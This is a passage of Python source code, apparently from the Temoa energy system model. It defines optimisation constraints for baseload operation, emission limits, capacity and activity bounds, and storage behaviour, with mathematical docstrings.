p\n period_length = value(M.PeriodLength[p])\n if frac >= period_length:\n # try to avoid floating point round-off errors for the common case.\n return 1\n\n # number of years into final period loan is complete\n\n frac /= float(period_length)\n return frac\n\n\ndef ParamLoanAnnualize_rule(M, t, v):\n dr = value(M.DiscountRate[t, v])\n lln = value(M.LifetimeLoanProcess[t, v])\n if not dr:\n return 1.0 / lln\n annualized_rate = (dr / (1.0 - (1.0 + dr) ** (-lln)))\n\n return annualized_rate\n\n\n# End initialization rules\n##############################################################################\n\n##############################################################################\n# Constraint rules\n\ndef BaseloadDiurnal_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThere exists within the electric sector a class of technologies whose\nthermodynamic properties are impossible to change over a short period of time\n(e.g. hourly or daily). These include coal and nuclear power plants, which\ntake weeks to bring to an operational state, and similarly require weeks to\nfully shut down. Temoa models this behavior by forcing technologies in the\n:code:`tech_baseload` set to maintain a constant output for all daily slices.\nNote that this allows the model to (not) use a baseload process in a season, and\nonly applies over the :code:`time_of_day` set.\n\nIdeally, this constraint would not be necessary, and baseload processes would\nsimply not have a :math:`d` index. However, implementing the more efficient\nfunctionality is currently on the Temoa TODO list.\n\n.. math::\n :label: BaseloadDaily\n\n SEG_{s, D_0}\n \\cdot \\textbf{ACT}_{p, s, d, t, v}\n =\n SEG_{s, d}\n \\cdot \\textbf{ACT}_{p, s, D_0, t, v}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{baseload}}\n\"\"\"\n # Question: How to set the different times of day equal to each other?\n\n # Step 1: Acquire a \"canonical\" representation of the times of day\n l_times = sorted(M.time_of_day) # i.e. a sorted Python list.\n # This is the commonality between invocations of this method.\n\n index = l_times.index(d)\n if 0 == index:\n # When index is 0, it means that we've reached the beginning of the array\n # For the algorithm, this is a terminating condition: do not create\n # an effectively useless constraint\n return Constraint.Skip\n\n # Step 2: Set the rest of the times of day equal in output to the first.\n # i.e. create a set of constraints that look something like:\n # tod[ 2 ] == tod[ 1 ]\n # tod[ 3 ] == tod[ 1 ]\n # tod[ 4 ] == tod[ 1 ]\n # and so on ...\n d_0 = l_times[0]\n\n # Step 3: the actual expression. For baseload, must compute the /average/\n # activity over the segment. By definition, average is\n # (segment activity) / (segment length)\n # So: (ActA / SegA) == (ActB / SegB)\n # computationally, however, multiplication is cheaper than division, so:\n # (ActA * SegB) == (ActB * SegA)\n expr = (\n M.V_Activity[p, s, d, t, v] * M.SegFrac[s, d_0]\n ==\n M.V_Activity[p, s, d_0, t, v] * M.SegFrac[s, d]\n )\n return expr\n\n\ndef EmissionLimit_Constraint(M, p, e):\n r\"\"\"\n\nA modeler can track emissions through use of the :code:`commodity_emissions`\nset and :code:`EmissionActivity` parameter. The :math:`EAC` parameter is\nanalogous to the efficiency table, tying emissions to a unit of activity. The\nEmissionLimit constraint allows the modeler to assign an upper bound per period\nto each emission commodity.\n\n.. math::\n :label: EmissionLimit\n\n \\sum_{I,T,V,O|{e,i,t,v,o} \\in EAC_{ind}} \\left (\n EAC_{e, i, t, v, o} \\cdot \\textbf{FO}_{p, s, d, i, t, v, o}\n \\right )\n \\le\n ELM_{p, e}\n\n \\\\\n \\forall \\{p, e\\} \\in ELM_{ind}\n\"\"\"\n emission_limit = M.EmissionLimit[p, e]\n\n actual_emissions = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, S_t, S_v, S_o]\n * M.EmissionActivity[e, S_i, S_t, S_v, S_o]\n\n for tmp_e, S_i, S_t, S_v, S_o in M.EmissionActivity.sparse_iterkeys()\n if tmp_e == e\n if M.ValidActivity(p, S_t, S_v)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(actual_emissions):\n msg = (\"Warning: No technology produces emission '%s', though limit was \"\n 'specified as %s.\\n')\n SE.write(msg % (e, emission_limit))\n return Constraint.Skip\n\n expr = (actual_emissions <= emission_limit)\n return expr\n\n\ndef MinCapacity_Constraint(M, p, t):\n r\"\"\" See MaxCapacity_Constraint \"\"\"\n\n min_cap = value(M.MinCapacity[p, t])\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] >= min_cap)\n return expr\n\n\ndef MaxCapacity_Constraint(M, p, t):\n r\"\"\"\n\nThe MinCapacity and MaxCapacity constraints set limits on the what the model is\nallowed to (not) have available of a certain technology. Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n.. math::\n :label: MinCapacityCapacityAvailableByPeriodAndTech\n\n \\textbf{CAPAVL}_{p, t} \\ge MIN_{p, t}\n\n \\forall \\{p, t\\} \\in \\Theta_{\\text{MinCapacity parameter}}\n\n.. math::\n :label: MaxCapacity\n\n \\textbf{CAPAVL}_{p, t} \\le MAX_{p, t}\n\n \\forall \\{p, t\\} \\in \\Theta_{\\text{MaxCapacity parameter}}\n\"\"\"\n max_cap = value(M.MaxCapacity[p, t])\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] <= max_cap)\n return expr\n\n\ndef MinCapacitySet_Constraint(M, p):\n r\"\"\" See MinCapacity_Constraint \"\"\"\n min_cap = value(M.MinCapacitySum[p])\n aggcap = sum(M.V_CapacityAvailableByPeriodAndTech[p, t]\n for t in M.tech_capacity_min\n )\n expr = (aggcap >= min_cap)\n return expr\n\n\ndef MaxCapacitySet_Constraint(M, p):\n r\"\"\" See MaxCapacity_Constraint \"\"\"\n max_cap = value(M.MaxCapacitySum[p])\n aggcap = sum(M.V_CapacityAvailableByPeriodAndTech[p, t]\n for t in M.tech_capacity_max\n )\n expr = (aggcap <= max_cap)\n return expr\n\n\ndef MaxActivity_Constraint(M, p, t):\n r\"\"\"\n\nThe MaxActivity sets an upper bound on the activity from a specific technology. Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n\"\"\"\n\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n max_act = value(M.MaxActivity[p, t])\n expr = (activity_pt <= max_act)\n return expr\n\n\ndef MinActivity_Constraint(M, p, t):\n r\"\"\"\n\nThe MinActivity sets a lower bound on the activity from a specific technology. Note that the indices\nfor these constraints are period and tech_all, not tech and vintage.\n\n\"\"\"\n\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n min_act = value(M.MinActivity[p, t])\n expr = (activity_pt >= min_act)\n return expr\n\n\ndef MinActivityGroup_Constraint(M, p, g):\n g_techs = set()\n for i in M.GroupOfTechnologies.value:\n if i[1] == g:\n g_techs.add(i[0])\n activity_p = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n\n for t in g_techs\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t)\n )\n min_act = value(M.MinGenGroupOfTechnologies_Data[p, g])\n expr = (activity_p >= min_act)\n return expr\n\n\n# def Storage_Constraint ( M, p, s, i, t, v, o ):\n# \tr\"\"\"\n#\n# Temoa's algorithm for storage is to ensure that the amount of energy entering\n# and leaving a storage technology is balanced over the course of a day,\n# accounting for the conversion efficiency of the storage process. This\n#\n# constraint relies on the assumption that the total amount of storage-related\n# energy is small compared to the amount of energy required by the system over a\n# season. If it were not, the algorithm would have to account for\n# season-to-season transitions, which would require an ordering of seasons within\n# the model. Currently, each slice is completely independent of other slices.\n#\n# .. math::\n# :label: Storage\n#\n# \\sum_{D} \\left (\n# EFF_{i, t, v, o}\n# \\cdot \\textbf{FI}_{p, s, d, i, t, v, o}\n# - \\textbf{FO}_{p, s, d, i, t, v, o}\n# \\right )\n# = 0\n#\n# \\forall \\{p, s, i, t, v, o\\} \\in \\Theta_{\\text{storage}}\n# \"\"\"\n# \ttotal_out_in = sum(\n# \t M.Efficiency[i, t, v, o]\n# \t * M.V_FlowIn[p, s, S_d, i, t, v, o]\n# \t - M.V_FlowOut[p, s, S_d, i, t, v, o]\n#\n# \t for S_d in M.time_of_day\n# \t)\n#\n# \texpr = ( total_out_in == 0 )\n# \treturn expr\n\n# def HourlyStorage_Constraint ( M, p, s, d, t ):\n#\n# \tInitialStorage = 0\t#batteries are assumed delivered uncharged\n#\n# \t#this is the sum of all input=i sent TO storage tech t of vintage v with output=o in P,S,D, (in PJ)\n# \tcharge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_i in M.ProcessInputs( p, t, S_v )\n# \t for S_o in M.ProcessOutputsByInput( p, t, S_v, S_i )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \t#this is the sum of all output=o withdrawn FROM storage tech t of vintage v with input=i P,S,D, (in PJ)\n# \tdischarge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_o in M.ProcessOutputs( p, t, S_v )\n# \t for S_i in M.ProcessInputsByOutput( p, t, S_v, S_o )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tstored_energy = charge - discharge\n#\n# # this hourly storage formulation allows stored energy to carry over through time of day and seasons, but must be zeroed out at the end of each period\n#\n# \tif d == M.time_of_day.last() and s == M.time_season.last(): #last time slice of the last season (aka end of period), must zero out\n# \t\td_prev = M.time_of_day.prev(d)\n# \t\texpr = ( M.V_HourlyStorage[p, s, d_prev, t] + stored_energy == 0 )\n#\n# \telif d == M.time_of_day.first() and s == M.time_season.first(): #first time slice of the first season (aka start of period), starts at zero\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == stored_energy )\n#\n# \telif d == M.time_of_day.first(): #first time slice of any season that is NOT the first season\n# \t\td_last = M.time_of_day.last()\n# \t\ts_prev = M.time_season.prev(s)\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == M.V_HourlyStorage[p,s_prev,d_last,t] + stored_energy )\n#\n# \telse: #so this is any time slice that is NOT covered above (so not the period end time slice; not the period beginning time slice; and not the first time slice of any season)\n# \t\td_prev = M.time_of_day.prev(d)\n# \t\texpr = ( M.V_HourlyStorage[p,s,d,t] == M.V_HourlyStorage[p,s,d_prev,t] + stored_energy )\n#\n# \treturn expr\n#\n# def HourlyStorage_UpperBound ( M, p, s, d, t ):\n# \t# V_HourlyStorage is in terms of PJ; so in any single time slice, amount of cumulative stored energy cannot exceed capacity (GW) * 8 (hours) = GWh\n# \t# need to convert GWh capacity to PJ (3600/10^6)\n#\n# \tenergy_capacity = M.V_CapacityAvailableByPeriodAndTech[p,t] * 8 * 3600 / 10**6\n#\n# #\tenergy_capacity = M.V_CapacityAvailableByPeriodAndTech[p,t] * value( M.CapacityToActivity[t] ) * value( M.SegFrac[s,d] ) * 8\n#\n# \texpr = ( M.V_HourlyStorage[p,s,d,t] <= energy_capacity )\n#\n# \treturn expr\n#\n# def HourlyStorage_LowerBound ( M, p, s, d, t ):\n# \t# V_HourlyStorage is in terms of PJ; so in any single time slice, amount of cumulative stored energy cannot dip below some minimum value (zero)\n# \t# need to convert GWh capacity to PJ (3600/10^6)\n#\n# \texpr = (M.V_HourlyStorage[p,s,d,t] >= 0) #no minimum charge, can achieve 100% DOD\n#\n# \treturn expr\n#\n# def HourlyStorageCharge_UpperBound ( M, p, s, d, t ):\n# \t# This must limit the rate that energy (PJ) can flow into the battery - limited by the battery size (capacity in GW)\n# \t# The battery capacity is defined by GW (GJ/s). Convert GJ/s to PJ/h, and this is the maximum that can flow into the battery in 1 hour\n#\n# #\thourly_charge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# #\t for S_v in ProcessVintages( p, t )\n# #\t for S_i in ProcessInputs( p, t, S_v )\n# #\t for S_o in ProcessOutputsByInput( p, t, S_v, S_i )\n# #\t)\n# #\n# #\tmax_charge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6 #converts GWh to PJ, treats each time slice as 1 hour\n#\n#\n# \thourly_charge = sum( M.V_FlowIn[p, s, d, S_i, t, S_v, S_o] * M.Efficiency[S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_i in M.ProcessInputs( p, t, S_v )\n# \t for S_o in M.ProcessOutputsByInput( p, t, S_v, S_i )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tmax_charge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6\t #converts GWh to PJ, treats each time slice as 92 hours\n#\n# \texpr = ( hourly_charge <= max_charge ) #energy charge rate cannot exceed the capacity of the battery (in GW)\n#\n# \treturn expr\n#\n# def HourlyStorageCharge_LowerBound ( M, p, s, d, t ):\n# \t# This must limit the rate that energy (PJ) can flow out of the battery - limited by the battery size (capacity in GW)\n# \t# The battery capacity is defined by GW (GJ/s). Convert GJ/s to PJ/h, and this is the maximum that can flow out of the battery in 1 hour\n#\n# \thourly_discharge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# \t for S_v in M.ProcessVintages( p, t )\n# \t for S_o in M.ProcessOutputs( p, t, S_v )\n# \t for S_i in M.ProcessInputsByOutput( p, t, S_v, S_o )\n# \t) * value( M.SegFrac[s,d] )\n#\n# \tmax_discharge = M.V_CapacityAvailableByPeriodAndTech[p,t] * 3600/10**6 #converts GWh to PJ, treats each time slice as 1 hour\n#\n# #\thourly_discharge = sum( M.V_FlowOut[p, s, d, S_i, t, S_v, S_o]\n# #\t for S_v in ProcessVintages( p, t )\n# #\t for S_o in ProcessOutputs( p, t, S_v )\n# #\t for S_i in ProcessInputsByOutput( p, t, S_v, S_o )\n# #\t)\n#\n# #\tmax_discharge = M.V_CapacityAvailableByPeriodAndTech[p,t] * (value( M.CapacityToActivity[t] ) * value( M.SegFrac[s,d] )) #converts GWh to PJ, treats each time slice as 92 hours\n#\n# \texpr = ( hourly_discharge <= max_discharge ) #energy discharge rate cannot exceed the capacity of the battery (in GW)\n#\n# \treturn expr\n\ndef StorageEnergy_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThis constraint tracks the amount of storage level (:math:`\\textbf{SL}_{p, s, d, t, v}`)\nassuming ordered time slices. The initial storage charge level is optimized\nfor the first time slice in each period, and then the charge level is updated each time\nslice based on the amount of energy stored or discharged. At the end of the last time\nslice associated with each period, the charge level must equal the starting charge level.\nIn the formulation below, note that :math:`\\textbf{stored_energy}` is an internal model\ndecision variable.\n\nFirst, the amount of stored energy in a given time slice is calculated as the\ndifference between the amount of energy stored (first term) and the amount of energy\ndispatched (second term). Note that the storage device's roundtrip efficiency is applied\non the input side:\n.. math::\n :label: StorageEnergy\n \\textbf{stored_energy} =\n \\sum_{I, O} \\textbf{FIS}_{p, s, d, i, t, v, o} \\cdot\n EFF_{i,t,v,o}\n -\n \\sum_{I, O} \\textbf{FO}_{p, s, d, i, t, v, o}\n\nWith :math:`\\bf{stored\\_energy}` calculated, the storage\ncharge level (:math:`\\textbf{SL}_{p,s,d,t,v}`) is updated, but the update procedure varies\nbased on the time slice within each time period. For the first season and time-of-day within\na given period:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} = \\textbf{SI}_{t,v} + \\textbf{stored_energy}\nFor the first time-of-day slice in any other season except the first:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} =\n \\textbf{SL}_{p, s_{prev}, d_{last}, t, v} + \\textbf{stored_energy}\nFor the last season and time-of-day in the year, the ending storage charge level\nshould be equal to the starting charge level:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} + \\textbf{stored_energy} = \\textbf{SI}_{t,v}\nFor all other time slices not explicitly outlined above:\n.. math::\n \\textbf{SL}_{p, s, d, t, v} = \\textbf{SL}_{p, s, d_{prev}, t, v} + \\textbf{stored_energy}\nAll equations below are sparsely indexed such that:\n.. math::\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{StorageEnergy}}\n\n\"\"\"\n # This is the sum of all input=i sent TO storage tech t of vintage v with\n # output=o in p,s,d\n charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n # This is the sum of all output=o withdrawn FROM storage tech t of vintage v\n # with input=i in p,s,d\n discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n stored_energy = charge - discharge\n\n # This storage formulation allows stored energy to carry over through\n # time of day and seasons, but must be zeroed out at the end of each period, i.e.,\n # the last time slice of the last season must zero out\n if d == M.time_of_day.last() and s == M.time_season.last():\n d_prev = M.time_of_day.prev(d)\n expr = M.V_StorageLevel[p, s, d_prev, t, v] + stored_energy == M.V_StorageInit[t, v]\n\n # First time slice of the first season (i.e., start of period), starts at full charge\n elif d == M.time_of_day.first() and s == M.time_season.first():\n expr = M.V_StorageLevel[p, s, d, t, v] == M.V_StorageInit[t, v] + stored_energy\n\n # First time slice of any season that is NOT the first season\n elif d == M.time_of_day.first():\n d_last = M.time_of_day.last()\n s_prev = M.time_season.prev(s)\n expr = (\n M.V_StorageLevel[p, s, d, t, v]\n == M.V_StorageLevel[p, s_prev, d_last, t, v] + stored_energy\n )\n\n # Any time slice that is NOT covered above (i.e., not the time slice ending\n # the period, or the first time slice of any season)\n else:\n d_prev = M.time_of_day.prev(d)\n expr = (\n M.V_StorageLevel[p, s, d, t, v]\n == M.V_StorageLevel[p, s, d_prev, t, v] + stored_energy\n )\n\n return expr\n\n\ndef StorageEnergyUpperBound_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThis constraint ensures that the amount of energy stored does not exceed\nthe upper bound set by the energy capacity of the storage device, as calculated\non the right-hand side.\nBecause the number and duration of time slices are user-defined, we need to adjust\nthe storage duration, which is specified in hours. First, the hourly duration is divided\nby the number of hours in a year to obtain the duration as a fraction of the year.\nSince the :math:`C2A` parameter assumes the conversion of capacity to annual activity,\nwe need to express the storage duration as fraction of a year. Then, :math:`SEG_{s,d}`\nsummed over the time-of-day slices (:math:`d`) multiplied by 365 days / yr yields the\nnumber of days per season. This step is necessary because conventional time sliced models\nuse a single day to represent many days within a given season. Thus, it is necessary to\nscale the storage duration to account for the number of days in each season.\n\n.. math::\n :label: StorageEnergyUpperBound\n\n\"\"\"\n energy_capacity = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * (M.StorageDuration[t] / 8760)\n * sum(M.SegFrac[s, S_d] for S_d in M.time_of_day) * 365\n * value(M.ProcessLifeFrac[p, t, v])\n )\n expr = M.V_StorageLevel[p, s, d, t, v] <= energy_capacity\n\n return expr\n\n\ndef StorageChargeRate_Constraint(M, p, s, d, t, v):\n r\"\"\"\n This constraint ensures that the charge rate of the storage unit is\n limited by the power capacity (typically GW) of the storage unit.\n\"\"\"\n # Calculate energy charge in each time slice\n slice_charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n # Maximum energy charge in each time slice\n max_charge = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n\n # Energy charge cannot exceed the power capacity of the storage unit\n expr = slice_charge <= max_charge\n\n return expr\n\n\ndef StorageDischargeRate_Constraint(M, p, s, d, t, v):\n r\"\"\"\n\tThis constraint ensures that the discharge rate of the storage unit\n\tis limited by the power capacity (typically GW) of the storage unit.\n\"\"\"\n # Calculate energy discharge in each time slice\n slice_discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n # Maximum energy discharge in each time slice\n max_discharge = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n\n # Energy discharge cannot exceed the capacity of the storage unit\n expr = slice_discharge <= max_discharge\n\n return expr\n\n\ndef StorageThroughput_Constraint(M, p, s, d, t, v):\n r\"\"\"\nIt is not enough to only limit the charge and discharge rate separately. We also\nneed to ensure that the maximum throughput (charge + discharge) does not exceed\nthe capacity (typically GW) of the storage unit.\n\"\"\"\n discharge = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputs(p, t, S_v)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, S_o)\n )\n\n charge = sum(\n M.V_FlowIn[p, s, d, S_i, t, v, S_o] * M.Efficiency[S_i, t, v, S_o]\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputs(p, t, S_v)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, S_i)\n )\n\n throughput = charge + discharge\n max_throughput = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * M.SegFrac[s, d]\n * value(M.ProcessLifeFrac[p, t, v])\n )\n expr = throughput <= max_throughput\n return expr\n\n\ndef StorageInit_Constraint(M,t,v):\n r\"\"\"\nThis constraint is used if the users wishes to force a specific initial storage charge level\nfor certain storage technologies and vintages. In this case, the value of the decision variable\n:math:`\\textbf{SI}_{t,v}` is set by this constraint rather than being optimized.\nUser-specified initial storage charge levels that are sufficiently different from the optimial\n:math:`\\textbf{SI}_{t,v}` could impact the cost-effectiveness of storage. For example, if the\noptimial initial charge level happens to be 50% of the full energy capacity, forced initial\ncharge levels (specified by parameter :math:`SIF_{t,v}`) equal to 10% or 90% of the full energy\ncapacity could lead to more expensive solutions.\n.. math::\n :label: StorageInit\n \\textbf{SI}_{t, v} \\le\n \\ SIF_{t,v}\n \\cdot\n \\textbf{CAP}_{t,v} \\cdot C2A_{t} \\cdot \\frac {SD_{t}}{8760 hrs/yr}\n \\cdot \\sum_{d} SEG_{s_{first},d} \\cdot 365 days/yr\n \\\\\n \\forall \\{t, v\\} \\in \\Theta_{\\text{StorageInit}}\n\"\"\"\n\n s = M.time_season.first()\n energy_capacity = (\n M.V_Capacity[t, v]\n * M.CapacityToActivity[t]\n * (M.StorageDuration[t] / 8760)\n * sum(M.SegFrac[s,S_d] for S_d in M.time_of_day) * 365\n * value(M.ProcessLifeFrac[v, t, v])\n )\n\n expr = M.V_StorageInit[t,v] == energy_capacity * M.StorageInitFrac[t,v]\n\n return expr\n\n\n\ndef TechInputSplit_Constraint(M, p, s, i, t, v):\n r\"\"\"\n\nAllows users to specify fixed or minimum shares of commodity inputs to a process \nproducing a single output. These shares can vary by model time period. See \nTechOutputSplit_Constraint for an analogous explanation.\n\"\"\"\n inp = sum(M.V_FlowIn[p, s, d, i, t, v, S_o]\n for S_o in M.ProcessOutputsByInput(p, t, v, i)\n for d in M.time_of_day\n\n )\n\n total_inp = sum(M.V_FlowIn[p, s, d, S_i, t, v, S_o]\n for S_i in M.ProcessInputs(p, t, v)\n for S_o in M.ProcessOutputsByInput(p, t, v, i)\n for d in M.time_of_day\n )\n\n expr = (inp >= M.TechInputSplit[p, i, t] * total_inp)\n return expr\n\n\ndef TechOutputSplit_Constraint(M, p, s, d, t, v, o):\n r\"\"\"\n\nSome processes take a single input and make multiple outputs, and the user would like to \nspecify either a constant or time-varying ratio of outputs per unit input. The most \ncanonical example is an oil refinery. Crude oil is used to produce many different refined \nproducts. In many cases, the modeler would like to specify a minimum share of each refined \nproduct produced by the refinery.\n\nFor example, a hypothetical (and highly simplified) refinery might have a crude oil input \nthat produces 4 parts diesel, 3 parts gasoline, and 2 parts kerosene. The relative \nratios to the output then are:\n\n.. math::\n\n d = \\tfrac{4}{9} \\cdot \\text{total output}, \\qquad\n g = \\tfrac{3}{9} \\cdot \\text{total output}, \\qquad\n k = \\tfrac{2}{9} \\cdot \\text{total output}\n\nNote that it is possible to specify output shares that sum to less than unity. In such \ncases, the model optimizes the remaining share. In addition, it is possible to change the \nspecified shares by model time period. The constraint is formulated as follows:\n\n.. math::\n :label: TechOutputSplit\n\n \\sum_{I} \\textbf{FO}_{p, s, d, i, t, v, o}\n \\geq\n SPL_{p, t, o} \\cdot \\textbf{ACT}_{p, s, d, t, v}\n\n \\forall \\{p, s, d, t, v, o\\} \\in \\Theta_{\\text{split output}}\n\"\"\"\n out = sum(M.V_FlowOut[p, s, d, S_i, t, v, o]\n for S_i in M.ProcessInputsByOutput(p, t, v, o))\n\n expr = (out >= M.TechOutputSplit[p, t, o] * M.V_Activity[p, s, d, t, v])\n return expr\n\n\ndef Activity_Constraint(M, p, s, d, t, v):\n r\"\"\"\nThe Activity constraint defines the Activity convenience variable. The Activity\nvariable is mainly used in the objective function to calculate the cost\nassociated with use of a technology. In English, this constraint states that\n\"the activity of a process is the sum of its outputs.\"\n\nThere is one caveat to keep in mind in regards to the Activity variable: if\nthere is more than one output, there is currently no attempt by Temoa to convert\nto a common unit of measurement. For example, common measurements for heat\ninclude mass of steam at a given temperature, or total BTUs, while electricity\nis generally measured in a variant of watt-hours. Reconciling these units of\nmeasurement, as for example with a cogeneration plant, is currently left as an\naccounting exercise for the modeler.\n\n.. math::\n :label: Activity\n\n \\textbf{ACT}_{p, s, d, t, v} = \\sum_{I, O} \\textbf{FO}_{p,s,d,i,t,v,o}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{activity}}\n\"\"\"\n activity = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, S_o]\n\n for S_i in M.ProcessInputs(p, t, v)\n for S_o in M.ProcessOutputsByInput(p, t, v, S_i)\n )\n\n expr = (M.V_Activity[p, s, d, t, v] == activity)\n return expr\n\n\ndef Capacity_Constraint(M, p, s, d, t, v):\n r\"\"\"\n\nTemoa's definition of a process' capacity is the total size of installation\nrequired to meet all of that process' demands. The Activity convenience\nvariable represents exactly that, so the calculation on the left hand side of\nthe inequality is the maximum amount of energy a process can produce in the time\nslice ````.\n\n.. math::\n :label: Capacity\n\n \\left (\n \\text{CFP}_{t, v}\n \\cdot \\text{C2A}_{t}\n \\cdot \\text{SEG}_{s, d}\n \\cdot \\text{TLF}_{p, t, v}\n \\right )\n \\cdot \\textbf{CAP}_{t, v}\n \\ge\n \\textbf{ACT}_{p, s, d, t, v}\n\n \\\\\n \\forall \\{p, s, d, t, v\\} \\in \\Theta_{\\text{activity}}\n\"\"\"\n\n if t in M.tech_storage:\n return Constraint.Skip\n\n produceable = (\n (value(M.CapacityFactorProcess[s, d, t, v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[s, d]))\n * value(M.ProcessLifeFrac[p, t, v])\n * M.V_Capacity[t, v]\n * value(M.CapReduction[p, t, v])) # JB - added v\n\n expr = (produceable >= M.V_Activity[p, s, d, t, v])\n return expr\n\n\n# sudan\ndef availableActivity_Constraint(M, p, t, v):\n # This is max produceable in a given year by a perticular technology\n max_produceable = sum((\n (value(M.CapacityFactorProcess[S_s, S_d, t, S_v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[S_s, S_d]))\n * value(M.ProcessLifeFrac[p, t, S_v])\n * M.V_Capacity[t, S_v]\n * value(M.CapReduction[p, t, S_v])) # JB - added 'S_v\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t))\n\n # This is what is produced in a year by a particular technology\n activity_pt = sum(M.V_Activity[p, S_s, S_d, t, S_v]\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(p, t))\n\n # If not then we have to deduct the produceable from the capacity built in the current year\n if t in M.delay:\n # Produceable from capacity built in the current year\n most_recent = sum((value(M.CapacityFactorProcess[S_s, S_d, t, S_v])\n * value(M.CapacityToActivity[t])\n * value(M.SegFrac[S_s, S_d]))\n\t\t\t\t\t\t * value(M.ProcessLifeFrac[p, t, S_v])\n\t\t\t\t\t\t * M.V_Capacity[t, S_v]\n\t\t\t\t\t\t * value(M.CapReduction[p, t, S_v]) # JB - added S_v\n\t\t\t\t\t\t for S_s in M.time_season\n\t\t\t\t\t\t for S_d in M.time_of_day\n\t\t\t\t\t\t for S_v in M.ProcessVintages(p, t)\n\t\t\t\t\t\t if S_v == p)\n max_produceable_delay = max_produceable - most_recent;\n expr = (activity_pt <= max_produceable_delay)\n return expr\n # If the technology has existing capacity then all good - then this constraint is same as previous constraint\n else:\n expr = (activity_pt <= max_produceable)\n return expr\n\n\ndef ExistingCapacity_Constraint(M, t, v):\n r\"\"\"\n\nTemoa treats residual capacity from before the model's optimization horizon as\nregular processes, that require the same parameter specification in the data\nfile as do new vintage technologies (e.g. entries in the efficiency table),\nexcept the :code:`CostInvest` parameter. This constraint sets the capacity of\nprocesses for model periods that exist prior to the optimization horizon to\nuser-specified values.\n\n.. math::\n :label: ExistingCapacity\n\n \\textbf{CAP}_{t, v} = ECAP_{t, v}\n\n \\forall \\{t, v\\} \\in \\Theta_{\\text{existing}}\n\"\"\"\n expr = (M.V_Capacity[t, v] == M.ExistingCapacity[t, v])\n return expr\n\n\ndef ResourceExtraction_Constraint(M, p, r):\n r\"\"\"\n\nThe ResourceExtraction constraint allows a modeler to specify an annual limit on\nthe amount of a particular resource Temoa may use in a period.\n\n.. math::\n :label: ResourceExtraction\n\n \\sum_{S, D, I, t \\in T^r, V} \\textbf{FO}_{p, s, d, i, t, v, c} \\le RSC_{p, c}\n\n \\forall \\{p, c\\} \\in \\Theta_{\\text{resource bound 